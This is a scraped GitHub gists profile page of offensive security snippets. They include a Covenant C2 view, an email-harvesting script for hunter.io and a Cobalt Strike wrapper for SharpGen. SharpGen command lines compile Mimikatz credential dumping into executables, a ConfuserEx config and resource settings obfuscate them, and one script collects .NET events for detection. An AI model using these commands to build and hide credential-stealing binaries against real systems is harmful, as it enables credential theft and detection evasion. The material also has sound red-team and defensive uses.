Skip to content

Instantly share code, notes, and snippets.

Avatar
💻
Hacking

Ryan Cobb cobbr

💻
Hacking
View GitHub Profile
View covenant-razor-example-1.cs
@using Covenant.Core
@using Covenant.Models.Grunts
@model GruntTasking
@{
Layout = "_GruntTaskingLayout";
ViewData["Title"] = "Grunts";
}
<div class="d-flex justify-content-between flex-wrap flex-md-nowrap pb-2 mb-3">
<h1 class="h2">GruntTasking: <span id="tasking-name" class="text-primary">@Html.DisplayFor(model => model.Name)</span></h1>
</div>
@cobbr
cobbr / hunter.py
Created Dec 7, 2018 — forked from Static-Flow/hunter.py
Simple Python 3 script to pull emails related to a domain from hunter.io and parse the data
View hunter.py
import requests
import sys
if len(sys.argv) is 3:
domain = sys.argv[1]
api_key = sys.argv[2]
if domain is not None:
url = "https://hunter.io/v2/domain-search?limit=10000&offset=0&domain="\
+domain+"&api_key="+api_key+"&format=json"
hunterJsonData = requests.get(url)
for email in hunterJsonData.json()['data']['emails']:
@cobbr
cobbr / CollectDotNetEvents.ps1
Last active Jan 24, 2019 — forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
View CollectDotNetEvents.ps1
function Start-DotNetEventCollection
{
Param(
[Parameter(Position = 0)]
[Alias('PSPath')]
[String] $TracePath = './dotNetTrace.etl',
[Parameter(Position = 1)]
[String] $TraceName = 'dotNetTrace'
)
@cobbr
cobbr / sharpgen.cna
Created Nov 8, 2018 — forked from dtmsecurity/sharpgen.cna
SharpGen Aggressor Beacon Wrapper
View sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
View sharpgen-example-7
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --no-optimization "Console.WriteLine(Mimikatz.LogonPasswords());"
...
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe
View sharpgen-confuserex-1
<project baseDir="{0}" outputDir="{1}" xmlns="http://confuser.codeplex.com">
<module path="{2}">
<rule pattern="true" inherit="false">
<!-- <protection id="anti debug" /> -->
<!-- <protection id="anti dump" /> -->
<!-- <protection id="anti ildasm" /> -->
<!-- <protection id="anti tamper" /> -->
<!-- <protection id="constants" /> -->
<!-- <protection id="ctrl flow" /> -->
<!-- <protection id="invalid metadata" /> -->
View sharpgen-example-6
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --confuse confuse.cr "Console.WriteLine(Mimikatz.LogonPasswords());"
...
[+] Confusing assembly...
[INFO] Confuser.Core 1.1.0-alpha1.52+gfe12a44191 Copyright © 2014 Ki, 2018 Martin Karing
[INFO] Running on Unix 17.5.0.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
[INFO] Discovered 10 protections, 1 packers.
[DEBUG] Resolving component dependency...
[INFO] Loading input modules...
[INFO] Loading 'example.exe'...
View sharpgen-resources-3
- Name: SharpSploit.Resources.powerkatz_x86.dll
File: powerkatz_x86.dll
Platform: x86
Enabled: false
- Name: SharpSploit.Resources.powerkatz_x64.dll
File: powerkatz_x64.dll
Platform: x64
Enabled: false
- Name: SharpSploit.Resources.powerkatz_x86.dll.comp
File: powerkatz_x86.dll.comp
View sharpgen-resources-2
- Name: SharpSploit.Resources.powerkatz_x86.dll
File: powerkatz_x86.dll
Platform: x86
Enabled: false
- Name: SharpSploit.Resources.powerkatz_x64.dll
File: powerkatz_x64.dll
Platform: x64
Enabled: true
View sharpgen-example-5
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --platform x64 "Console.WriteLine(Mimikatz.LogonPasswords());"